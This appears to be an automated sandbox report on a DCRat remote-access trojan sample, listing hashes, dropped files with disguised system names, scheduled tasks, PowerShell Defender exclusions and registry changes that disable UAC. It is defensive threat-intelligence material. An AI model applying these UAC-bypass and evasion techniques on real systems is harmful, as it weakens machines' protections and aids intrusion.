dcrat | d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce

Resubmissions

13/01/2025, 04:00

250113-ek259svldv 10

12/01/2025, 15:28

250112-swpwzazrdl 10

Analysis

max time kernel
891s
max time network
428s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13/01/2025, 04:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Size

984KB
MD5

808d571c621732642832aaca4a519717
SHA1

cf71f6fc8f7ad0d691cf899928296be33ed46e49
SHA256

d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce
SHA512

f01bb94b9bc2482aebb8862a2cc6a1f43afce1796df373c4d3dd2c33e68f06849c704a4c0a79320f6a1ab04c5227416445c4fe715c18fdfc0bc123f0f79cfb88
SSDEEP

12288:syEIOYTNEIf5AycvEhKIV6tEcln0Ai2a61h3cQ9Fk+ntGoWuzsx1oiLgo+:syErYT+PvXIUln/1GJgo+

Score

10^/10

dcrat evasion execution infostealer rat trojan

Malware Config

Signatures

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		2736	schtasks.exe
		4184	schtasks.exe
		3436	schtasks.exe
		1788	schtasks.exe
		3092	schtasks.exe
		1164	schtasks.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\886983d96e3d3e		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3540	schtasks.exe
		4224	schtasks.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\0a1fd5f707cd16		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3304	schtasks.exe
		4332	schtasks.exe
		4412	schtasks.exe
		3540	schtasks.exe
		3788	schtasks.exe
		1996	schtasks.exe
File created	C:\Program Files\Windows Portable Devices\ea9f0e6c9e2dcd		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3572	schtasks.exe
File created	C:\Program Files (x86)\Windows Portable Devices\ee2ad38f3d4382		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3520	schtasks.exe
File created	C:\Program Files\Internet Explorer\SIGNUP\0a1fd5f707cd16		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		1208	schtasks.exe
		3460	schtasks.exe
		4232	schtasks.exe
		4280	schtasks.exe
		1888	schtasks.exe
		228	schtasks.exe
		3932	schtasks.exe
		1436	schtasks.exe
File created	C:\Windows\Prefetch\ReadyBoot\6cb0b6c459d5d3		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		2500	schtasks.exe
		712	schtasks.exe
		436	schtasks.exe
		820	schtasks.exe
		2780	schtasks.exe
		3180	schtasks.exe
		4952	schtasks.exe
		3432	schtasks.exe
		2128	schtasks.exe
		1584	schtasks.exe
		4156	schtasks.exe
		3496	schtasks.exe
		1576	schtasks.exe
		4088	schtasks.exe
		4836	schtasks.exe
		4680	schtasks.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\66fc9ff0ee96c2		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\6ccacd8608530f		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3012	schtasks.exe
		3476	schtasks.exe
		4160	schtasks.exe
		4872	schtasks.exe
		1552	schtasks.exe
		3972	schtasks.exe
		4132	schtasks.exe
		2560	schtasks.exe
		3300	schtasks.exe
		4100	schtasks.exe
		2492	schtasks.exe
		2812	schtasks.exe
		3488	schtasks.exe
File created	C:\Windows\PolicyDefinitions\uk-UA\6cb0b6c459d5d3		d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
		3056	schtasks.exe
		3672	schtasks.exe

Dcrat family
dcrat

Process spawned unexpected child process 57 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3476	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3540	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3432	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3932	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3672	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	712	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3520	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3056	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3496	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1208	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3460	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3972	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3092	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2560	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4412	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4224	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3572	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3488	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2812	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3556	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3300	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4160	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1164	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4232	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3540	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	2628	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	2628	schtasks.exe	83

UAC bypass 3 TTPs 57 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe

DCRat payload 14 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/3568-1-0x00000000004C0000-0x00000000005BC000-memory.dmp	dcrat
behavioral2/files/0x000a000000023b75-25.dat	dcrat
behavioral2/files/0x000d000000023bba-94.dat	dcrat
behavioral2/files/0x000d000000023b71-118.dat	dcrat
behavioral2/files/0x000a000000023bbc-153.dat	dcrat
behavioral2/files/0x000c000000023bbd-209.dat	dcrat
behavioral2/memory/424-499-0x0000000000BD0000-0x0000000000CCC000-memory.dmp	dcrat
behavioral2/memory/4744-510-0x00000000003E0000-0x00000000004DC000-memory.dmp	dcrat
behavioral2/files/0x000b000000023bbb-511.dat	dcrat
behavioral2/files/0x000b000000023b8c-519.dat	dcrat
behavioral2/memory/1216-521-0x0000000000110000-0x000000000020C000-memory.dmp	dcrat
behavioral2/memory/4268-530-0x0000000000510000-0x000000000060C000-memory.dmp	dcrat
behavioral2/files/0x000c000000023b75-546.dat	dcrat
behavioral2/memory/2200-548-0x0000000000580000-0x000000000067C000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4884	powershell.exe
2420	powershell.exe
4464	powershell.exe
2420	powershell.exe
1896	powershell.exe
4896	powershell.exe
2460	powershell.exe
2684	powershell.exe
1776	powershell.exe
2800	powershell.exe
1556	powershell.exe
4680	powershell.exe
4436	powershell.exe
1844	powershell.exe
3784	powershell.exe
4132	powershell.exe
4952	powershell.exe
3460	powershell.exe
4268	powershell.exe
4252	powershell.exe
4812	powershell.exe
1608	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe

Executes dropped EXE 21 IoCs

pid	Process
492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
1584	wininit.exe
424	sihost.exe
3948	Idle.exe
1896	lsass.exe
1816	unsecapp.exe
4744	System.exe
3740	Registry.exe
3468	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
1444	sihost.exe
1216	sppsvc.exe
564	winlogon.exe
1116	explorer.exe
4268	dwm.exe
2868	Idle.exe
2552	wininit.exe
2812	csrss.exe
3040	dllhost.exe
2904	sysmon.exe
2200	taskhostw.exe
3544	sihost.exe

Checks whether UAC is enabled 1 TTPs 38 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	csrss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	winlogon.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	System.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskhostw.exe

Drops file in Program Files directory 41 IoCs

description	ioc	Process
File created	C:\Program Files\Internet Explorer\SIGNUP\sppsvc.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Internet Explorer\SIGNUP\0a1fd5f707cd16	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Internet Explorer\SIGNUP\RCXC4B9.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\RCXB411.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Internet Explorer\SIGNUP\RCXC4A8.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
